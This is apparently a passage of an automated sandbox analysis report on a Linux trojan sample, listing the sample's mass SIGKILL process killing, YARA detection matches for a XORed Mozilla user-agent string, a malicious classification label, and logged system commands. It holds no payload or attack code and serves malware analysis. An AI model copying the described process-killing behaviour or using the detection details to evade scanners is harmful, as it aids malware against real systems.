Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5659, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5668, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5669, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5671, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5674, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5734, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5740, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5746, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5750, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5757, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5763, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5843, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5849, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5850, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5851, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5852, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5854, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5857, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5917, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5924, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5925, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5947, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5948, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5956, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5961, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5286) SIGKILL sent: pid: 936, result: successful
Yara signature match
Source: nSg5RM0w0d, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5278.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5281.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5294.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5282.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.000000001aa4a697.0000000013aff119.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5290.1.00000000bae8d7b5.000000001aa4a697.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5289.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5286.1.000000006df8adf2.000000004f0c6a25.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Sample tries to kill a process (SIGKILL)
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 936, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5286, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 491, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 658, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 720, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 721, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 759, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 761, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 772, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 774, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 777, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 785, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 793, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1334, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1335, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1344, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1872, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 1886, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 2048, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5041, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5179, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5180, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5282, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5290, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5294, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5321, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5372, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5386, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5459, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5461, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5566, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5567, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5571, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5575, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5653, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5659, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5668, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5669, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5671, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5674, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5734, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5740, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5746, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5750, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5757, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5763, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5843, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5849, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5850, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5851, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5852, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5854, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5857, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5917, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5924, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5925, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5947, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5948, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5956, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5280) SIGKILL sent: pid: 5961, result: successful
Source: /tmp/nSg5RM0w0d (PID: 5286) SIGKILL sent: pid: 936, result: successful
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal100.spre.troj.lin@0/184@16/0

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /usr/bin/dbus-daemon (PID: 5372) File: /proc/5372/mounts
Source: /usr/bin/dbus-daemon (PID: 5527) File: /proc/5527/mounts
Source: /bin/fusermount (PID: 5544) File: /proc/5544/mounts
Source: /usr/bin/dbus-daemon (PID: 5571) File: /proc/5571/mounts
Source: /usr/bin/dbus-daemon (PID: 5671) File: /proc/5671/mounts
Source: /usr/bin/dbus-daemon (PID: 5757) File: /proc/5757/mounts
Source: /usr/bin/dbus-daemon (PID: 5854) File: /proc/5854/mounts
Source: /usr/bin/dbus-daemon (PID: 5947) File: /proc/5947/mounts
Source: /usr/bin/dbus-daemon (PID: 5956) File: /proc/5956/mounts
Source: /usr/bin/dbus-daemon (PID: 6046) File: /proc/6046/mounts
Source: /usr/bin/dbus-daemon (PID: 6110) File: /proc/6110/mounts
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /usr/share/gdm/generate-config (PID: 5492) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/share/gdm/generate-config (PID: 5661) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/share/gdm/generate-config (PID: 5842) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Source: /usr/share/gdm/generate-config (PID: 6019) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 5472) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5474) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5476) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5478) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5480) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5483) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5485) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5489) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5518) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /bin/sh (PID: 5635) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5637) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5640) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5642) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5644) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5646) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5651) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5655) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5755) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /bin/sh (PID: 5821) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5823) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5825) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5828) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5831) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5833) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5838) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5840) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5928) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5931) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5935) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5938) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
